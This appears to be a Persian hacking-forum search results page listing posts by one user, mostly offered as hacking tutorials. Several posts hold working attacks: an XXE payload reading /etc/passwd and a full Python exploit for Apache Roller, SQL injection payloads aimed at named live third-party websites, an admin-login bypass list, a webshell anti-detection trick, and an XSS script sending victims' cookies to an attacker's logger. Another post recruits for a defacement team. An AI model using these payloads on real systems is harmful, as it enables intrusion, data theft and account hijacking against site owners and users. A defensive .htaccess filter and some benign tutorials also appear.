discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'mr.msa'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

45 نتیجه پیدا شد

  1. با سلام خدمت دوستان عزیز با اموزش اسیب پذیری XXE یا XML External Entity در خدمت شما هستیم . توضیجات اولیه :‌ با استفاده از این اسیب پذیری شما قادر به دسترسی به فایل های سمت سرور و سیستمی دارید این اسیب پذیری سمت سرور است و زمانی رخ میده که ارسال ورودی xml انجام شده باشه و بر ورودی ها نظارت نباشه و خوب کانفیگ نکرده باشن ، از مزایای دیگر اسیب پذیری میتوان به استخراج اطلاعات حساس اسکن پورت های باز و جعل درخواست سمت سرور رو انجام داد ، ضعفی که باعث می شود این آسیب پذیری به وجود آید سمت سرور است که با دستورات XML Parser انجام میشود و اگردرخوست های ورودی توسط کلاینت به سرور رو خوب کنترل نکرده باشند باعث میشه که نفوذگر با استفاده از دستورات XML Parser اقدام به حمله کند . آشنایی با XML Parser : XML Parser یک آبجکتی است که اکثر مرورگر ها اونو ساپورت می کنند می توانید داکیومنت ها و اطلاعات را نیز استخراج کند و همچنین اقدام به خواندن تگ های XML کنید . XPath Injection : اسیب پذیری XXE Injection خیلی شباهت داره به اسیب پذیری Xpath Injection که قبلا اموزشش رو در انجمن قرار دادم :‌ انواع حملات XXE : : Exploiting XXE to retrieve file در این حمله استخراج اطلاعات صورت میگیرد : Exploiting XXE to Perform SSRF attack در این حمله امکان ترکیب اسیب پذیری SSRF هم وجود دارد . :‌ Exploiting Blind XXE exfiltrate data out-of-band این حمله زمانی صورت می گیره که داده های حساس در حال انتقال از میان سرور و کاربر هستند و جایی که داده ها از سرور برنامه به سیستمی منتقل می شوند و هکر می تواند آن ها رو کنترل کند . توی این جلسه قراره به حمله Exploiting XXE to retrieve file بپردازیم : برای مثال شما یک فرم رو سابمیت میکنید یا هر چیز دیگه بعد با استفاده از ابزار Burp Suite درخواست ها رو برسی میکنید و برای مثال این کد رو مشاهده میکنید :‌ <?xml version=”1.0” encoding=”UTF-8”?> و در این تگ برخی از این پارامتر ها اومده :‌ <stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> حالا اگر بین این دو تگ این دستور xml رو قرار دهید و پارامتر ۲ را تغییر دهید فایل passwd رو فراخوانی میکنه : <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> کد اولیه (بدون هیچ تغییر ) :‌ <?xml version=”1.0” encoding=”UTF-8”?><stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> و تبدیلش میکنیم به این :‌ <?xml version=”1.0” encoding=”UTF-8”?> <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> <stockCheck><productld>&xxe;</productld><storeld>1</storeld></stockCheck> و توی پاسخ میبینید که فایل passwd رو فراخوانی کرده ، در ضمن باید توی burp از قسمت repeater اقدام کنید . ویدئو : تئوری . پروژه محور یک . پروژه محور دو . اکسپلویت :‌ # Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) # Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" # Date: 2018-09-05 # Exploit Author: Marko Jokic # Contact: http://twitter.com/_MarkoJokic # Vendor Homepage: http://roller.apache.org/ # Software Link: http://archive.apache.org/dist/roller/ # Version: < 5.0.3 # Tested on: Linux Ubuntu 14.04.1 # CVE : CVE-2014-0030 # This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. # There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. # 'SIMPLE' payload will work in most cases and will be used by default, if # server errors out, use 'ADVANCED' payload. # 'ADVANCED' payload will start local web server and serve malicious XML which # will be parsed by a target server. # To successfully perform attack with 'ADVANCED' payload, make sure that port # you listen on (--lport flag) is accessible out of the network. #!/usr/bin/env python import SimpleHTTPServer import SocketServer import argparse import sys import threading from xml.etree import ElementTree import urllib3 import requests SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file://{}">]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file://{}"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "{}"> %dtd; ]> <methodCall> <methodName>&all;</methodName> </methodCall> """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<!ENTITY all "%start;%xxe;%end;">') def check_exploit(host): response = requests.post(host + "/roller-services/xmlrpc", verify=False) if response.status_code == 200: return True return False def exploit(host, payload): response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) xml_tree = ElementTree.fromstring(response.text) parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text print parsed_response def start_web_server(port): handler = MyHandler httpd = SocketServer.TCPServer(('', port), handler, False) httpd.allow_reuse_address = True httpd.server_bind() httpd.server_activate() httpd.handle_request() httpd.shutdown() def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") args = parser.parse_args() host = args.url full_file_path = args.file advanced = False lhost = args.lhost lport = args.lport if lport is not None and lport is not None: advanced = True check = check_exploit(host) if check: if advanced: th = threading.Thread(target=start_web_server, args=(lport,)) th.daemon = True th.start() payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport)) else: payload = SIMPLE_PAYLOAD.format(full_file_path) exploit(host, payload) else: print "[-] TARGET IS NOT VULNERABLE!" main() مقاله : یک سری مقاله که میتونه خیلی مفید باشه . Owasp : https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing Owasp : https://owasp.org/www-chapter-pune/XXE_Exploitation.pdf Doddsecurity : https://doddsecurity.com/312/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system Medium : https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b Exploit DB : https://www.exploit-db.com/docs/48583 ====================================================================== لایک فراموش نشه ، موفق و پیروز باشید .
  2. با سلام خدمت دوستان عزیز در این ویدئو که از مجموعه تست آسیب پذیری سایت ها بود ما کپچا دو سایت هاستینگ رو بررسی کردیم! سعی کردم تجربیاتم رو به خوبی انتقال بدم و به بهترین شکل ویدئو باشه. ( از بابت بالا بودن صدای اهنگ هم شرمنده ویدئوی بعدی حتما برطرف میشه) موفق و پیروز باشید.
  3. لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
  4. با سلام خدمت دوستان عزیز ویدئوی جدید در رابطه با راه های کسب درآمد از هک و امنیت که خیلی ها علاقه دارن لینک سایت های استفاده شده : hackerone.com bugdasht.ir kolahsefid.org faradars.org faranesh.com toplearn.com maktabkhooneh.org exploit-db.com
  5. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  6. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  7. با سلام خدمت دوستان عزیز انجمن تیم امنیتی گاردایران . چند هفته پیش دو وب سایت خبری رو گزارش کردم که خواستم اینجا قرار بدم . وب سایت اول پایگاه خبری هاناخبر :‌ http://www.hanakhabar.ir/news.php?id=28AD1E61 وب سایت دوم پایگاه خبر زریان موکریان : https://www.ziryanmukryan.ir/news.php?id=36D1F4BA و در کنارش اسیب پذیری های شرکت کیهان افزار رو هم گزارش کردم اما پستی نزاشتن برای همین فقط لینک سایت رو میزارم . تشکر میکنم از شرکت کیهان افزار که به خوبی اسیب پذیری ها رو تایید کردن و بحث های امنیتی رو رعایت میکنند . موفق و پیروز باشید .
  8. با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری ‌Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید :‌ دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .
  9. MR.MSA

    Sql injection Exploit

    با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : https://signoelevators.com/product-range.php?id=-561%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ https://www.raceias.com/news-details.php?id=-6%27%20union%20select%201,version(),3,4,5,6,7,8,9--+ https://taekwondofederationofindia.com/news-detail.php?id=-1%27%20union%20select%201,2,3,4,version(),6,7--+
  10. با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .
  11. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  12. با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  13. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  14. MR.MSA

    آموزش باگ xss

    با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار :‌ با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ :‌ برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید :‌ <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="http://site.com/xss.php?c=" + document.cookie </script> یا <script>document.location="http://site.com/xss.php?c="%2bdocument.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : http://site.com/cookie.html و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موق و پیروز باشید .
  15. MR.MSA

    Mr.Hasher Tool

    با سلام خدمت شما دوستان عزیز انجمن تیم امنیتی گاردایران با یک ابزار در خدمتتون هستیم . Mr.Hasher نویسنده نسخه PHP‌: @MR.MSA نویسنده نسخه C# : @HCSH4C39 نحوه استفاده : امروز می خوام یه ابزار رو ارائه بدم که شما یک متن رو میدید بهش و برای شما به انواع هش ها هش میکنه . نسخه : این برنامه در دو نسخه php و c# ارائه می شود که php تحت وب و c# قابلیت اجرایی exe (تحت ویندوز) هست . نوع هش ها : در نسخه php MD5 MD4 MD2 SHA1 SHA224 SHA256 SHA384 SHA512 SHA3-224 SHA3-256 SHA3-384 SHA3-512 RIPEMD-128 RIPEMD-160 RIPEMD-256 RIPEMD-320 FNV132 FNV1A64 FNV164 FNV1A32 HAVAL-128,3 HAVAL-160,3 HAVAL-192,3 HAVAL-224,3 HAVAL-256,3 HAVAL-128,4 HAVAL-160,4 HAVAL-192,4 HAVAL-224,4 HAVAL-256,4 HAVAL-128,5 HAVAL-160,5 HAVAL-192,5 HAVAL-224,5 HAVAL-256,5 TIGER-128,3 TIGER-160,3 TIGER-192,3 TIGER-128,4 TIGER-160,4 TIGER-192,4 ADLER-32 CONVERTUUENCODE GOST JOAAT CRC32C CRC32B CRC32 SNEFRU WHIRLPOOL BASE64 HEX ASCII در نسخه C# MD5 SHA 160 SHA 256 SHA 384 SHA 512 RIPEMD 160 لینک های مهم : 1- GitHub 2- Demo Online موفق و پیروز باشید .
  16. با سلام خدمت دوستان عزیز گاردایران در این تاپیک قصد دارم زبان برنامه نویسی CSS رو به شما آموزش بدهم . ----------------------------------------------------------------------------------------------------------------------- ابتدا کمی با css اشنا شویم :‌ css یک زبان برنامه نویسی تحت وب هست که بیشتر در کنار html استفاده می شود ، این زبان برای طراحی سایت از نظر ظاهری هست . برای مثال رنگ متن ها ، پس زمینه ، نوع اسکرول و ... رو با css طراحی می کنند . امروزه که بیشتر افراد به طراحی وب و برنامه نویسی تحت وب روی اورده اند زبان css می تونه زبان کاربردی باشه . پیش نیاز css ، اشنایی با زبان html هست . دیگه بیشتر از این سرتون رو درد نمیارم . 😄 ----------------------------------------------------------------------------------------------------------------------- سبک های اضافه کردن css به html : ۱- خارجی و یا External ۲- داخلی و یا internal ۳- درون خطی و یا inline که در تاپیک بعد به همراه مثال خدمتتون عرض می کنم . ----------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : اسپم ندید . سوالات رو در پ.خ ارسال کنید . کتاب و مقالات رو در اینجا ارسال نکنید . (مگر اینکه خودتون نوشته باشید) اگر قصد گذاشتن آموزشی در رابطه با css دارید ابتدا به من پیام دهید (در غیر این صورت پست شما حذف می شود ) . موفق و پیروز باشید .
  17. با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" نصب با wget : sh -c "$(wget https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)" نصب با github : https://github.com/ohmyzsh/ohmyzsh.git نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : https://github.com/ohmyzsh/ohmyzsh/wiki/Themes و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در 